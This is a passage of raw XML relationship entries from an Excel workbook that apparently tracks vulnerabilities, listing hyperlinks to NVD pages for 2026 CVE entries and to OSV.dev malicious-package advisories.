Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90028" TargetMode="External" Id="rId1646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90029" TargetMode="External" Id="rId1647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90031" TargetMode="External" Id="rId1648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90033" TargetMode="External" Id="rId1649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90034" TargetMode="External" Id="rId1650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90035" TargetMode="External" Id="rId1651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90039" TargetMode="External" Id="rId1652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90040" TargetMode="External" Id="rId1653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90999" TargetMode="External" Id="rId1654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92126" TargetMode="External" Id="rId1655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92571" TargetMode="External" Id="rId1656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16246" TargetMode="External" Id="rId1657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16245" TargetMode="External" Id="rId1658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16244" TargetMode="External" Id="rId1659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16247" TargetMode="External" Id="rId1660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16204" TargetMode="External" Id="rId1661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16205" TargetMode="External" Id="rId1662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16206" TargetMode="External" Id="rId1663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16207" TargetMode="External" Id="rId1664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16208" TargetMode="External" Id="rId1665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16209" TargetMode="External" Id="rId1666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16210" TargetMode="External" Id="rId1667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16211" TargetMode="External" Id="rId1668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16212" TargetMode="External" Id="rId1669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16213" TargetMode="External" Id="rId1670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16214" TargetMode="External" Id="rId1671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16215" TargetMode="External" Id="rId1672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16216" TargetMode="External" Id="rId1673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16217" TargetMode="External" Id="rId1674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16219" TargetMode="External" Id="rId1675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16220" TargetMode="External" Id="rId1676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16222" TargetMode="External" Id="rId1677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16223" TargetMode="External" Id="rId1678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16224" TargetMode="External" Id="rId1679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16225" TargetMode="External" Id="rId1680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16226" TargetMode="External" Id="rId1681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16227" TargetMode="External" Id="rId1682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16228" TargetMode="External" Id="rId1683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16229" TargetMode="External" Id="rId1684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16230" TargetMode="External" Id="rId1685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16231" TargetMode="External" Id="rId1686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16232" TargetMode="External" Id="rId1687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16233" TargetMode="External" Id="rId1688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16234" TargetMode="External" Id="rId1689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16235" TargetMode="External" Id="rId1690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16236" TargetMode="External" Id="rId1691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16237" TargetMode="External" Id="rId1692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16238" TargetMode="External" Id="rId1693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16239" TargetMode="External" Id="rId1694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16240" TargetMode="External" Id="rId1695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16241" TargetMode="External" Id="rId1696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16242" TargetMode="External" Id="rId1697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16243" TargetMode="External" Id="rId1698" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId3" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet4.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20130" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20192" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65381" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70416" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76423" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92808" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16338" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20234" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20307" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20322" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20324" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20325" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20329" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20330" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20332" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87719" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-59953" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12793" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14349" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20242" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20326" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27546" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27565" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54334" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57127" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57131" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57967" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65414" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78573" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79724" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81204" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81467" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82617" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84520" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84561" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84609" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85594" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85595" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85596" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89778" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89783" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89788" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89847" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89857" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89969" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89970" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89972" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89990" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90012" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90036" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90037" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90038" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90042" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90048" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91843" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92787" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92805" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12944" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20331" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82107" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92716" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15640" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73453" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77411" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58146" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73447" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73461" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77405" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81046" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85192" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90680" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90937" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15639" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40855" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58147" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73172" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89082" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89083" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89775" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89914" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89915" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89916" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89918" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89930" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90049" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90945" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90961" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91104" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91106" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73456" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90562" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15638" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20176" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20194" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20211" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20237" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20284" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20305" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20306" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20341" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43790" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45764" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49364" 